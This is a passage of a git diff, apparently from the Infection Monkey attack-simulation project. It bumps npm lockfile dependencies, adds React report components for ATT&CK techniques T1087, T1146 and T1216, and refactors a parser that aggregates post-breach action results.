"https://registry.npmjs.org/mkdirp/-/mkdirp-1.0.4.tgz", + "integrity": "sha512-vVqVZQyf3WLx2Shd0qJ9xuvqgAyKPLAiqITEtqW0oIUjzo3PePDd6fW9iFz30ef7Ysp/oiWqbhszeGWW2T6Gzw==" + }, "ms": { "version": "2.1.2", "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", @@ -15086,6 +15083,21 @@ "source-map-support": "^0.5.7", "tslib": "^1.9.3", "uuid": "^3.3.2" + }, + "dependencies": { + "event-loop-spinner": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/event-loop-spinner/-/event-loop-spinner-1.1.0.tgz", + "integrity": "sha512-YVFs6dPpZIgH665kKckDktEVvSBccSYJmoZUfhNUdv5d3Xv+Q+SKF4Xis1jolq9aBzuW1ZZhQh/m/zU/TPdDhw==", + "requires": { + "tslib": "^1.10.0" + } + }, + "uuid": { + "version": "3.4.0", + "resolved": "https://registry.npmjs.org/uuid/-/uuid-3.4.0.tgz", + "integrity": "sha512-HjSDRw6gZE5JMggctHBcjVak08+KEVhSIiDzFnT9S9aegmp85S/bReBVTb4QTFaRNptJ9kuYaNhnbNEOkbKb/A==" + } } }, "tmp": { @@ -15095,6 +15107,11 @@ "requires": { "rimraf": "^3.0.0" } + }, + "uuid": { + "version": "8.3.0", + "resolved": "https://registry.npmjs.org/uuid/-/uuid-8.3.0.tgz", + "integrity": "sha512-fX6Z5o4m6XsXBdli9g7DtWgAx+osMsRRZFKma1mIUsLCz6vRvv+pz5VNbyu9UEDzpMWulZfvpgb/cmDXVulYFQ==" } } }, @@ -15213,6 +15230,43 @@ "tslib": "^2.0.0" }, "dependencies": { + "@snyk/cli-interface": { + "version": "2.8.0", + "resolved": "https://registry.npmjs.org/@snyk/cli-interface/-/cli-interface-2.8.0.tgz", + "integrity": "sha512-St/G39iJG1zQK15L24kcVYM2gmFc/ylBCcBqU2DMZKJKwOPccKLUO6s+dWIUXMccQ+DFS6TuHPvuAKQNi9C4Yg==", + "requires": { + "@snyk/dep-graph": "1.19.0", + "@snyk/graphlib": "2.1.9-patch", + "tslib": "^1.9.3" + }, + "dependencies": { + "@snyk/dep-graph": { + "version": "1.19.0", + "resolved": "https://registry.npmjs.org/@snyk/dep-graph/-/dep-graph-1.19.0.tgz", + "integrity": "sha512-/0phOICMk4hkX2KtZgi+4KNd5G9oYDIlxQDQk+ui2xl4gonPvK6Q5MFzHP7Xet1YY/XoU33ox41i+IO48qZ+zQ==", + "requires": { + "@snyk/graphlib": "2.1.9-patch", + "lodash.isequal": "^4.5.0", + "object-hash": "^2.0.3", + "semver": "^6.0.0", + "source-map-support": "^0.5.19", + "tslib": "^2.0.0" + }, + "dependencies": { + "tslib": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/tslib/-/tslib-2.0.1.tgz", + "integrity": "sha512-SgIkNheinmEBgx1IUNirK0TUD4X9yjjBRTqqjggWCU3pUEqIk3/Uwl3yRixYKT6WjQuGiwDv4NomL3wqRCj+CQ==" + } + } + }, + "tslib": { + "version": "1.13.0", + "resolved": "https://registry.npmjs.org/tslib/-/tslib-1.13.0.tgz", + "integrity": "sha512-i/6DQjL8Xf3be4K/E6Wgpekn5Qasl1usyw++dAA35Ue5orEn65VIxOA+YvNNl9HV3qv70T7CNwjODHZrLwvd1Q==" + } + } + }, "ansi-styles": { "version": "4.2.1", "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.2.1.tgz", @@ -15270,6 +15324,11 @@ "glob": "^7.1.3" } }, + "semver": { + "version": "6.3.0", + "resolved": "https://registry.npmjs.org/semver/-/semver-6.3.0.tgz", + "integrity": "sha512-b39TBaTSfV6yBrapU89p5fKekE2m/NwnDocOVruQFS1/veMgdzuPcnOM34M6CwxW8jH/lxEa5rBoDeUwu5HHTw==" + }, "supports-color": { "version": "7.1.0", "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.1.0.tgz", @@ -15339,26 +15398,18 @@ } }, "snyk-mvn-plugin": { - "version": "2.17.1", - "resolved": "https://registry.npmjs.org/snyk-mvn-plugin/-/snyk-mvn-plugin-2.17.1.tgz", - "integrity": "sha512-U7ZKrKVnUW2gcyYIzvc0w9nRYh4NXv+wShTIcs++ARCAJOG9A4nxh+ZRmINQ7Sy7EB2qLIRwN4Ssr17+y2mhuA==", + "version": "2.18.0", + "resolved": "https://registry.npmjs.org/snyk-mvn-plugin/-/snyk-mvn-plugin-2.18.0.tgz", + "integrity": "sha512-ika5I/8G3wDUT7L+3mDIyzh6Xc4bK8sBhcfFnhpFS0WvOMRAdF4kpshfZ1HzFRsRfe/4YgA3T/D7EoJRtu7Aiw==", "requires": { - "@snyk/cli-interface": "2.5.0", - "@snyk/java-call-graph-builder": "1.10.0", + "@snyk/cli-interface": "2.8.1", + "@snyk/java-call-graph-builder": "1.12.1", "debug": "^4.1.1", "needle": "^2.5.0", "tmp": "^0.1.0", "tslib": "1.11.1" }, "dependencies": { - "@snyk/cli-interface": { - "version": "2.5.0", - "resolved": "https://registry.npmjs.org/@snyk/cli-interface/-/cli-interface-2.5.0.tgz", - "integrity": "sha512-XMc2SCFH4RBSncZgoPb+BBlNq0NYpEpCzptKi69qyMpBy0VsRqIQqddedaazMCU1xEpXTytq6KMYpzUafZzp5Q==", - "requires": { - "tslib": "^1.9.3" - } - }, "debug": { "version": "4.1.1", "resolved": "https://registry.npmjs.org/debug/-/debug-4.1.1.tgz", @@ -15407,16 +15458,6 @@ "tslib": "^1.9.3", "uuid": "^3.3.2", "yaml": "^1.9.2" - }, - "dependencies": { - "event-loop-spinner": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/event-loop-spinner/-/event-loop-spinner-2.0.0.tgz", - "integrity": "sha512-1y4j/Mhttr8ordvHkbDsGzGrlQaSYJoXD/3YKUxiOXIk7myEn9UPfybEk/lLtrcU3D4QvCNmVUxVQaPtvAIaUw==", - "requires": { - "tslib": "^1.10.0" - } - } } }, "snyk-nuget-plugin": { @@ -17417,9 +17458,9 @@ "dev": true }, "update-notifier": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/update-notifier/-/update-notifier-4.1.0.tgz", - "integrity": "sha512-w3doE1qtI0/ZmgeoDoARmI5fjDoT93IfKgEGqm26dGUOh8oNpaSTsGNdYRN/SjOuo10jcJGwkEL3mroKzktkew==", + "version": "4.1.1", + "resolved": "https://registry.npmjs.org/update-notifier/-/update-notifier-4.1.1.tgz", + "integrity": "sha512-9y+Kds0+LoLG6yN802wVXoIfxYEwh3FlZwzMwpCZp62S2i1/Jzeqb9Eeeju3NSHccGGasfGlK5/vEHbAifYRDg==", "requires": { "boxen": "^4.2.0", "chalk": "^3.0.0", diff --git a/monkey/monkey_island/cc/ui/package.json b/monkey/monkey_island/cc/ui/package.json index 45ac1cfba..330050848 100644 --- a/monkey/monkey_island/cc/ui/package.json +++ b/monkey/monkey_island/cc/ui/package.json @@ -105,7 +105,7 @@ "react-tooltip-lite": "^1.12.0", "redux": "^4.0.4", "sha3": "^2.1.3", - "snyk": "^1.363.0" + "snyk": "^1.368.0" }, "snyk": true } diff --git a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1087.js b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1087.js new file mode 100644 index 000000000..1973580d3 --- /dev/null +++ b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1087.js @@ -0,0 +1,45 @@ +import React from 'react'; +import ReactTable from 'react-table'; +import {renderMachineFromSystemData, ScanStatus} from './Helpers'; +import MitigationsComponent from './MitigationsComponent'; + +class T1087 extends React.Component { + + constructor(props) { + super(props); + } + + static getColumns() { + return ([{ + columns: [ + { Header: 'Machine', + id: 'machine', + accessor: x => renderMachineFromSystemData(x.machine), + style: {'whiteSpace': 'unset'}}, + { Header: 'Result', + id: 'result', + accessor: x => x.result, + style: {'whiteSpace': 'unset'}} + ] + }]) + } + + render() { + return ( +
+
{this.props.data.message}
+
+ {this.props.data.status === ScanStatus.USED ? + : ''} + +
+ ); + } + } + + export default T1087; diff --git a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1146.js b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1146.js new file mode 100644 index 000000000..26693b892 --- /dev/null +++ b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1146.js @@ -0,0 +1,45 @@ +import React from 'react'; +import ReactTable from 'react-table'; +import {renderMachineFromSystemData, ScanStatus} from './Helpers'; +import MitigationsComponent from './MitigationsComponent'; + +class T1146 extends React.Component { + + constructor(props) { + super(props); + } + + static getColumns() { + return ([{ + columns: [ + { Header: 'Machine', + id: 'machine', + accessor: x => renderMachineFromSystemData(x.machine), + style: {'whiteSpace': 'unset'}}, + { Header: 'Result', + id: 'result', + accessor: x => x.result, + style: {'whiteSpace': 'unset'}} + ] + }]) + } + + render() { + return ( +
+
{this.props.data.message}
+
+ {this.props.data.status === ScanStatus.USED ? + : ''} + +
+ ); + } + } + + export default T1146; diff --git a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1216.js b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1216.js new file mode 100644 index 000000000..e608492a1 --- /dev/null +++ b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1216.js @@ -0,0 +1,45 @@ +import React from 'react'; +import ReactTable from 'react-table'; +import {renderMachineFromSystemData, ScanStatus} from './Helpers'; +import MitigationsComponent from './MitigationsComponent'; + +class T1216 extends React.Component { + + constructor(props) { + super(props); + } + + static getColumns() { + return ([{ + columns: [ + { Header: 'Machine', + id: 'machine', + accessor: x => renderMachineFromSystemData(x.machine), + style: {'whiteSpace': 'unset'}}, + { Header: 'Result', + id: 'result', + accessor: x => x.result, + style: {'whiteSpace': 'unset'}} + ] + }]) + } + + render() { + return ( +
+
{this.props.data.message}
+
+ {this.props.data.status === ScanStatus.USED ? + : ''} + +
+ ); + } +} + +export default T1216; diff --git a/monkey/monkey_island/cc/ui/src/components/report-components/security/PostBreachParser.js b/monkey/monkey_island/cc/ui/src/components/report-components/security/PostBreachParser.js index b56a532f7..4bb420f71 100644 --- a/monkey/monkey_island/cc/ui/src/components/report-components/security/PostBreachParser.js +++ b/monkey/monkey_island/cc/ui/src/components/report-components/security/PostBreachParser.js @@ -1,33 +1,62 @@ export default function parsePbaResults(results) { - results.pba_results = aggregateShellStartupPba(results.pba_results); + results.pba_results = aggregateMultipleResultsPba(results.pba_results); return results; } const SHELL_STARTUP_NAME = 'Modify shell startup file'; +const CMD_HISTORY_NAME = 'Clear command history'; -function aggregateShellStartupPba(results) { - let isSuccess = false; - let aggregatedPbaResult = undefined; - let successfulOutputs = ''; - let failedOutputs = ''; +const multipleResultsPbas = [SHELL_STARTUP_NAME, CMD_HISTORY_NAME] - for(let i = 0; i < results.length; i++){ - if(results[i].name === SHELL_STARTUP_NAME && aggregatedPbaResult === undefined){ - aggregatedPbaResult = results[i]; +function aggregateMultipleResultsPba(results) { + let aggregatedPbaResults = {}; + multipleResultsPbas.forEach(function(pba) { + aggregatedPbaResults[pba] = { + aggregatedResult: undefined, + successfulOutputs: '', + failedOutputs: '', + isSuccess: false } - if(results[i].name === SHELL_STARTUP_NAME && results[i].result[1]){ - successfulOutputs += results[i].result[0]; - isSuccess = true; + }) + + function aggregateResults(result) { + if (aggregatedPbaResults[result.name].aggregatedResult === undefined) { + aggregatedPbaResults[result.name].aggregatedResult = result; } - if(results[i].name === SHELL_STARTUP_NAME && ! results[i].result[1]){ - failedOutputs += results[i].result[0]; + if (result.result[1]) { + aggregatedPbaResults[result.name].successfulOutputs += result.result[0]; + aggregatedPbaResults[result.name].isSuccess = true; + } + else if (!result.result[1]) { + aggregatedPbaResults[result.name].failedOutputs += result.result[0]; } } - if(aggregatedPbaResult === undefined) return results; - results = results.filter(result => result.name !== SHELL_STARTUP_NAME); - aggregatedPbaResult.result[0] = successfulOutputs + failedOutputs; - aggregatedPbaResult.result[1] = isSuccess; - results.push(aggregatedPbaResult); + function checkAggregatedResults(pbaName) { // if this pba's results were aggregated, push to `results` + if (aggregatedPbaResults[pbaName].aggregatedResult !== undefined) { + aggregatedPbaResults[pbaName].aggregatedResult.result[0] = (aggregatedPbaResults[pbaName].successfulOutputs + + aggregatedPbaResults[pbaName].failedOutputs); + aggregatedPbaResults[pbaName].aggregatedResult.result[1] = aggregatedPbaResults[pbaName].isSuccess; + results.push(aggregatedPbaResults[pbaName].aggregatedResult); + } + } + + // check for pbas with multiple results and aggregate their results + for (let i = 0; i < results.length; i++) + if (multipleResultsPbas.includes(results[i].name)) + aggregateResults(results[i]); + + // if no modifications were made to the results, i.e. if no pbas had mutiple results, return `results` as it is + let noResultsModifications = true; + multipleResultsPbas.forEach((pba) => { + if (aggregatedPbaResults[pba].aggregatedResult !== undefined) + noResultsModifications = false; + }) + if (noResultsModifications) + return results; + + // if modifications were made, push aggregated results to `results` and return + results = results.filter(result => !multipleResultsPbas.includes(result.name)); + multipleResultsPbas.forEach(pba => checkAggregatedResults(pba)); return results; }